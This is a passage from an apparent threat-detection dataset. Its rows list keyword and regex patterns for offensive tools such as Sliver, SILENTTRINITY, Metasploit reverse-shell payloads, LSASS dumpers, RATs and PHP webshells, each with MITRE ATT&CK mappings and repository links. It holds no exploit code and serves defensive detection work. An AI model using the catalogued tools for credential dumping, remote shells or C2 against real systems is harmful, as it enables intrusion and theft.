T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*SilentMoonwalk.cpp*",".{0,1000}SilentMoonwalk\.cpp.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.exe*",".{0,1000}SilentMoonwalk\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.sln*",".{0,1000}SilentMoonwalk\.sln.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk-master*",".{0,1000}SilentMoonwalk\-master.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentProcessExitRegistrySetter.cpp*",".{0,1000}SilentProcessExitRegistrySetter\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*SilentProcessExitRegistrySetter.exe*",".{0,1000}SilentProcessExitRegistrySetter\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*SILENTTRINITY*",".{0,1000}SILENTTRINITY.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*silenttrinity*.dll*",".{0,1000}silenttrinity.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*silly.host.of.iodine.code.kryo.se*",".{0,1000}silly\.host\.of\.iodine\.code\.kryo\.se.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*SillyRAT.git*",".{0,1000}SillyRAT\.git.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*sillyrat.py*",".{0,1000}sillyrat\.py.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*silver*/beacon.go*",".{0,1000}silver.{0,1000}\/beacon\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*silver*implant.go*",".{0,1000}silver.{0,1000}implant\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*SilverPoision*",".{0,1000}SilverPoision.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SilverPoision","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SilverPoision/Rock-ON*",".{0,1000}SilverPoision\/Rock\-ON.{0,1000}","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. Stay tuned for the Stable version with a UI","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","3","290","71","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z" "*Simone Margaritelli *",".{0,1000}Simone\sMargaritelli\s\.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*SimoneLazzaris/ditty*",".{0,1000}SimoneLazzaris\/ditty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" "*Simple code for creating a DLL for netsh helper DLLs*",".{0,1000}Simple\scode\sfor\screating\sa\sDLL\sfor\snetsh\shelper\sDLLs.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*Simple PHP backdoor by DK*",".{0,1000}Simple\sPHP\sbackdoor\sby\sDK.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Simple powershell/C# to spawn a process under a different parent process*",".{0,1000}Simple\spowershell\/C\#\sto\sspawn\sa\sprocess\sunder\sa\sdifferent\sparent\sprocess.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*Simple Shellcode Runner.csproj*",".{0,1000}Simple\sShellcode\sRunner\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Simple Shellcode Runner.ps1*",".{0,1000}Simple\sShellcode\sRunner\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Simple Shellcode Runner.vba*",".{0,1000}Simple\sShellcode\sRunner\.vba.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*simple_dropper.ninja*",".{0,1000}simple_dropper\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*simplekeylogger.*",".{0,1000}simplekeylogger\..{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*SimpleNtSyscallFuzzer.v11.suo*",".{0,1000}SimpleNtSyscallFuzzer\.v11\.suo.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*SimpleNTSyscallFuzzer-main\*",".{0,1000}SimpleNTSyscallFuzzer\-main\\.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*SimplyEmail.py*",".{0,1000}SimplyEmail\.py.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplyEmail-master*",".{0,1000}SimplyEmail\-master.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplySecurity/SimplyEmail*",".{0,1000}SimplySecurity\/SimplyEmail.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimShell - Simorgh Security MGZ*",".{0,1000}SimShell\s\-\sSimorgh\sSecurity\sMGZ.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*single_reverse_tcp_shell.s*",".{0,1000}single_reverse_tcp_shell\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*single_shell_bind_tcp.asm*",".{0,1000}single_shell_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*single_shell_reverse_tcp.asm*",".{0,1000}single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*single_target_exploit.rb*",".{0,1000}single_target_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sipdump2john.py*",".{0,1000}sipdump2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*sipvicious_svcrack* -u100",".{0,1000}sipvicious_svcrack.{0,1000}\s\-u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sitadel http://*",".{0,1000}sitadel\shttp\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*sitadel https://*",".{0,1000}sitadel\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*sitadel.py *",".{0,1000}sitadel\.py\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*Sitadel-master.zip*",".{0,1000}Sitadel\-master\.zip.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*site-packages/wfuzz*",".{0,1000}site\-packages\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*-Situational-Awareness-BOF*",".{0,1000}\-Situational\-Awareness\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*skaffold run -m nemesis *",".{0,1000}skaffold\srun\s\-m\snemesis\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*skahwah*wordsmith*",".{0,1000}skahwah.{0,1000}wordsmith.{0,1000}","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","2","160","22","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z" "*skelsec/evilrdp*",".{0,1000}skelsec\/evilrdp.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*skelsec/jackdaw*",".{0,1000}skelsec\/jackdaw.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 - T1590 - T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*skelsec/pysnaffler*",".{0,1000}skelsec\/pysnaffler.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*SkipPasswordAgeCheck*",".{0,1000}SkipPasswordAgeCheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SkipPortScan*",".{0,1000}SkipPortScan.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*skymem-get-mails *",".{0,1000}skymem\-get\-mails\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*SkyperTHC/bpf-keylogger*",".{0,1000}SkyperTHC\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*SLACKAES256Handler.*",".{0,1000}SLACKAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*slackor.db*",".{0,1000}slackor\.db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Slackor\impacket*",".{0,1000}Slackor\\impacket.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Sleep for * ms* redirect to KrakenMask !*",".{0,1000}Sleep\sfor\s.{0,1000}\sms.{0,1000}\sredirect\sto\sKrakenMask\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense 